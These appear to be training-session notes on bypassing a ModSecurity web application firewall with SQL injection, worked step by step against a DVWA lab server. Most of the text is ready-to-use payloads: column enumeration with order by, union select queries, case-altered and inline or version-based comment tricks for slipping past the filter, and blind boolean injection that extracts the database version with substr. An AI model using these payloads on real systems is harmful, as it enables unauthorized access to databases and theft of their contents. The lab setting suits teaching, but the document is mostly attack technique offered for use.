Session Bypassing MOD_SECURITY

1. Bypassing MOD_SECURITY
2. ======================
3.  
4. Bypassing WAF Validations and Filterations
5. ------------------------------------------
6. Step 1: Attacking Union Based Injection of WAF based website.(*note open the ip address of the waf)
7. http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1
8.  
9. Step 2: Produce an error(By adding an extra single quote)
10. http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1'
11.  
12. Step 3: Lets try to get the total number of columns from the respective table of the url.
13. http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 1--+
14. http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 2--+
15. http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 3--+
16.  
17. or in the input field 1' order by 1#,1' order by 2#,order by 3#.
18.  
19. Step 4: Now when you know about the number of columns you can use union select statement to find out vulnerable columns
20.  
21. http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+
22. or
23. for the input field 1' union select 1,2#
24.  
25.  
26. As you can see we are being blocked by the firewall. Lets understand how it was happened.
27.  
28. Here we used union which was placed in the database as the malicious input which should not come from a user. As this request received by the web server its passed on to WAF in WAF it is compared with the blacklist database and as it matched with union inside the database it was blocked.
29.  
30. union --->Web Server -->MOd Security (List of malicious input word which includes union)---> X Blocked.
31.  
32. Bypassing Technique 1
33. Upper Lower Case Change
34.  
35. 1. Upper Lower Case Method
36.  
37. union all select : UnIoN aLl SeLeCt
38.  
39. in the input field add the following
40.  
41. 1' uNiOn sEleCt 1,2#
42. The above statement would not work
43.  
44. 1' /*!union*/ /*!select*/ 1,2#
45. Inline Comments : /*! */
46.  
47. Technique Number two : Inline Executable Comments
48. 1' /*!union*/ /*!select*/ 1,2#
49.  
50.  
51. Step 2: 1' /*!union*/ /*!select*/ 1,/*!table_name*/ from /*!information_schema.tables*/#
52.  
53. Target Table is users
54.  
55. Technique number 3: Version Based Inline Executable Comments
56. ------------------------------------------------------------
57. /*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/
58.  
59. MYSQL Versions
60. 5.00.00 --> 50000
61. 4.00.00 --> 40000
62. 3.00.00 --> 30000
63. 2.00.00 --> 20000
64. 1.00.00 --> 10000
65.  
66. Step 3:
67. 1' /*!50000union*/ /*!50000select*/ 1,/*!50000table_name*/ from /*!50000information_schema.tables*/#
68.  
69.  
70. Blind SQL Injection
71. -------------------
72. Blind SQL injection is a type of sql injection attack that ask the database true or false questions and determine the answer based on the application response.
73.  
74. This attack is often used when the web application is configured to show generic error message, but has not mitigated the code that is vulnerable to SQLi.
75.  
76. This type of sql injection is identical to normal sql injection, the only is the data retreived from the database.
77. 1. Blind Boolean
78. 2. Time Based SQL Injection
79.  
80.  
81. Demo
82. -----
83.  
84. Step 3: As you can see if we get output as
85. 1' and 1=0 # ---> False
86.  
87. 1' and 1=1 # ---> True
88.  
89. 1' and 1=0 order by 1 # --> No Result ---> Generic error
90.  
91. 1' and 1=1 order by 1 # --> Result --> normal result
92.  
93. 1' and 1=0 order by 2 # --> No result
94.  
95. so we can execute our statements e.g
96. Steps
97.  
98. Step 1:
99. 1' and 1=1 order by 1 # --data
100. 1' and 1=1 order by 2 # --data
101. 1' and 1=1 order by 3 # --no data at this point you have to realise only two columns are present
102.  
103. Then you can go on executing union select statements
104.  
105. Step 2:
106. 1' and 1=1 union select 1,2#
107.  
108. Substring and Blind boolean injection
109. -----------
110. we know that hacker would be able to ask some true false question and database will show answer in 0 and 1 so we would use substring here,substr is a function in sql that brings the charater values and we are basically asking is the condition true or false.
111.  
112. version() gives the version
113. version is 10.1.34-MariaDB
114.  
115. substr(version(),1,1)=1#
116. substr(version(),index,position from that index)
117.  
118. so the above statement would check if at index position and would only select the character/number at index 1, At index number 1 '1' is present so if the condition provided is true/false it would give the answer in 0/1.
119.  
120.  
121. index 1->1
122. index 2->0
123. index 3->.
124. index 4->1
125. index 5->.
126.  
127. step 3: 1' and 1=1 union select 1,substr(version(),1,1)=1#
128.  
129. answer 1 as the above condition is true
130.  
131.  
132. similarly we can also ask something like
133.  
134. 1' and 1=1 union select 1,substr(version(),3,1)='.'#
135. The above statement means go to version check at index number 3 if the value there is equal to '.'.Version is 10.1.34-MariaDB and at index 3 there is a dot .so the above condition is true database will answer 1.
136.  
137.  
138. Drive Link
139.  
140.  
141.  
142. https://drive.google.com/file/d/19umEKD0TfKwTbPL16RaTlyz0dMskINDb/view?usp=sharing